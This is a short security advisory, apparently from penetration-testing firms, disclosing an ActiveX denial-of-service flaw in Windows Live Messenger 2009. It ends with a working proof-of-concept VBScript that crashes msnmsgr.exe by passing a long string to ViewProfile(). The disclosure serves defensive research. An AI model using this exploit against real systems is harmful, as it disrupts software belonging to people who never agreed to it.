Product: Windows Live Messenger 2009 (Build 14.0.8089.726) ******************************************************************************** Vulnerability: ActiveX - Denial of Service ******************************************************************************** Discussion: Vulnerability is in Activex Control(msgsc.14.0.8089.726.dll) Sending a string to ViewProfile() , cause a crash on msnmsgr.exe *must be signed in Msn Messenger account for triggerin the vulnerability. ******************************************************************************** Vulnerable: Windows Live Messenger 2009 on Windows Vista Windows Live Messenger 2009 on Windows 7 Not Vulnerable: Windows Live Messenger 2009 on Windows XP Credits: HACKATTACK IT SECURITY GmbH Penetration Testing in Deutschland - Österreich - Schweiz www.hackattack.com and Natal Networks Inc. Vulnerability Discovery, Penetration Testing, IT Security Consulting www.natalnetworks.com ******************************************************************************** Original Advisory www.hackattack.com www.natalnetworks.com ******************************************************************************** PoC .wsf script: 'works on vista and windows7 <package> <job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:B69003B3-C55E-4B48-836C-BC5946FC3B28' id='target' /> <script language='vbscript'> arg1=("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA") target.ViewProfile arg1 </script> </job> </package> About HACKATTACK and Natal Networks ================ HACKATTACK IT SECURITY GmbH is a Penetrationtest and Security Auditing company located in Germany and Austria More Information about HACKATTACK at http://www.hackattack.com Natal Networks was founded by Hellcode Research Team in 2009. Main mission of Natal Network is discover and research vulnerabilities. Providing penetration tests and security auditing services. More about; www.natalnetworks.com